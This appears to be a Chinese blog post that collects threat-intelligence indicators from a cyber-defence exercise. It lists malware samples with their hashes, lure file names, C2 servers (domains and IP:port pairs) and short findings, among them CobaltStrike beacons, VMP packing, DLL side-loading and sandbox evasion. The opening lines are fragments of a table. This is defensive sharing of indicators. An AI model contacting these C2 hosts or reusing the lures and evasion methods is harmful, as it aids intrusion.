bfd83		 34bbc5f933d
1ad90c1cac3
32b41bf9bec
92af7d9		 54fb06778a2ae9c92a2ee
6cc2d0a36ed51d8ff85ef
bdfb05ba5e2dcc5d2c8c5
1		 http://service-npbgee6g-1318291227.gz.apigw.tencentcs.com/ Coba
ltSt
rike
木马

30.8.17日演习相关样本信息(奇安信)

  • 恶意样本为了对抗安全分析人员的静态分析常用手段之一就是加壳保护,而有些保护壳还带有检测调试器、虚拟机等对抗动态分析的功能,这无疑加大了分析难度,阻碍了对相关安全事件的排查处置过程。为此,红雨滴云沙箱提供了尽可能真实的模拟运行环境,让此类带壳样本“无感”运行,从而捕获它们存在的恶意行为,助力分析人员对样本的研判。

  • 红雨滴云沙箱近期捕获的与演习相关的样本包括:“团队个人业绩提成分红核对.exe”,“安全检查工具-v1.41.zip”,“数据脱敏在数据中台产品的实践与应用-0814.docx.exe”,“****人才管理系统V1.1.zip”等。其中“团队个人业绩提成分红核对.exe”带有VMP壳,运行时释放白利用组件,然后连接C2服务器。

  • 部分演习相关样本红雨滴云沙箱报告列表

    • 样本名称 MD5 红雨滴云沙箱报告链接 备注
      团队个人业绩提成分红核对.ex e1f4ef51d6ead7bf529149a810110b0c 红雨滴云沙箱报告[1] VMP壳,释放白利用组件
      安全检查工具-v1.41.zip 112299dc0c2eb3eb90d4e34befcb8e20 红雨滴云沙箱报告[2] DLL白利用
      数据脱敏在数据中台产品的实践与应用-0814.docx.exe ff7c7c2643861d43a9da48ac102b8d14 红雨滴云沙箱报告[3] 木马
      ****人才管理系统V1.1.zip f4a4ddb61b5da29f25d5943c93dec62 红雨滴云沙箱报告[4] 木马

  • 案例:使用VMP加壳的攻击样本分析

    • 样本基本信息

    • 红雨滴云沙箱报告链接 https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AYoCSirWCf0-QUp-80a7
      样本文件名 团队个人业绩提成分红核对.exe
      样本MD5 e1f4ef51d6ead7bf529149a810110b0c
      样本类型 PE32 Executable for MS Windows (EXE)
      样本大小 1923312字节
      RAS检测结果 Signed_PE neutral-lang
      样本基因特征 解压执行 探针 检测虚拟机 可疑命令行 检测沙箱 联网行为 程序崩溃 持久化

31.样本:shell_decode.exe

  • MD5:a1a58457b6c9d65afdbefd15c7b1660c
SHA1:a25ef1ac773b1596b32aaafa1c2f5b592a3c1924
SHA256:ffa040b8fce33207e80970d48784377ed35656e12bb70159fb3f7f5270ba0a8a
样本特点:域前置
分析结论:CobaltStrike木马

32.样本:终端敏感信息排查工具.msi

  • MD5:85034c49780e28d3b3c0ece838fbf960
SHA1:9e59295c18bfbf9e5ada9033090f0e413203fd4c
SHA256:d4068c7d76303b969c1eb3de2f9e4d5129643994d8b6b7bd9b1cec7924344544
C2:service-pl24nmy2-1318291290.gz.apigw.tencentcs.com
分析结论:CobaltStrike木马

33.样本:啸天的个人简历.exe

  • MD5:2ec21a59168a0ad194c9550ade0ca4b8
SHA1:f509960b71159adedea32623a7eaee3adc421943
SHA256:18e787d35902bc1c4b54f0375eb37900ca0c1410c8b582736b70f57453850b60
C2:64.176.194.76:60443
样本特点:Python打包Stager
分析结论:后门木马

34.样本:beacon.exe

  • MD5:5ce93a9baca86e2e81ac6ac494a19619
SHA1:45d25f97983b8c287c3d5508137fd0b2ef5aaf2d
SHA256:0231ef7688fdb6b53821c0d10eb0ab3267ad6536bcd45078f65b38e32d5c7b08
C2:111.180.194.195:6699
分析结论:CobaltStrike木马
posted @ 2023-09-03 01:36  树大招疯  阅读(403)  评论(0编辑  收藏  举报